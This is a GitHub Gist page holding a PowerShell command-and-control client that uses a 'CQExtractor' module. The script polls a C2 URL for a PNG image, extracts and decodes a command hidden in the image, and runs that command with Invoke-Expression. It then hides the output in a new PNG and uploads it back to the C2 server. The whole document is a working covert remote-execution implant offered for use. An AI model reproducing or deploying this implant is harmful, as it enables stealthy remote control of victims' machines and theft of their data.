Created
September 23, 2019 14:01
-
-
Save adenkiewicz/a84d31a37ba15882113749df15b99ef2 to your computer and use it in GitHub Desktop.
C2 client based on CQExtractor module
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Import-Module .\CQExtractor.psm1 -Force | |
# FIXME: replace with real C2 hostname | |
$C2 = "http://c2:8080/image.png" | |
$filename = "image.png" | |
$filename2 = "image2.png" | |
class Encoder { | |
[system.collections.hashtable]$arr | |
Encoder() { | |
$this.arr = New-Object system.collections.hashtable | |
$this.arr["l"] = ".A" | |
$this.arr["1"] = ".B" | |
$this.arr["L"] = ".C" | |
$this.arr["i"] = ".D" | |
$this.arr["I"] = ".E" | |
$this.arr["o"] = ".F" | |
$this.arr["O"] = ".G" | |
$this.arr["0"] = ".H" | |
$this.arr["w"] = ".J" | |
$this.arr["W"] = ".K" | |
$this.arr["="] = ".Q" | |
} | |
[string] Encode([string]$str) { | |
$bytes = [System.Text.Encoding]::Unicode.GetBytes($str) | |
$str =[Convert]::ToBase64String($bytes) | |
foreach ($key in $this.arr.Keys) { | |
$str = $str.Replace($key,$this.arr["$key"]) | |
} | |
return $str | |
} | |
[string] Decode($str) { | |
foreach ($key in $this.arr.Keys) { | |
$str = $str.Replace($this.arr["$key"],$key) | |
} | |
return [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($str)) | |
} | |
} | |
$encoder = new-object Encoder | |
while (1) { | |
$lastEdit = (Get-Item $filename).LastWriteTime | |
$request = Invoke-WebRequest -URI $C2 -Method HEAD | |
if ([DateTime]($request.Headers.'Last-Modified') -le $lastEdit) { | |
# nothing new on the server | |
Start-Sleep -s 2 | |
Continue | |
} | |
$response = Invoke-WebRequest -URI $C2 -outfile $filename | |
$b64 = (Export-PngToString -Path $filename).text | |
$cmd = $encoder.Decode($b64) | |
if ($cmd) { # Invoke payload | |
[string]$result = Invoke-Expression -Command $cmd | |
# Save result | |
$encoder.encode($result) | Export-StringToPng -Path $filename2 | |
try { | |
Invoke-RestMethod -Method PUT -Uri $C2 -InFile $filename2 | |
} catch {} | |
} | |
else { | |
write-error "Couldn't decode ($b64/$cmd)" | |
try { | |
Invoke-RestMethod -Method PUT -Uri $C2 | |
} catch {} | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment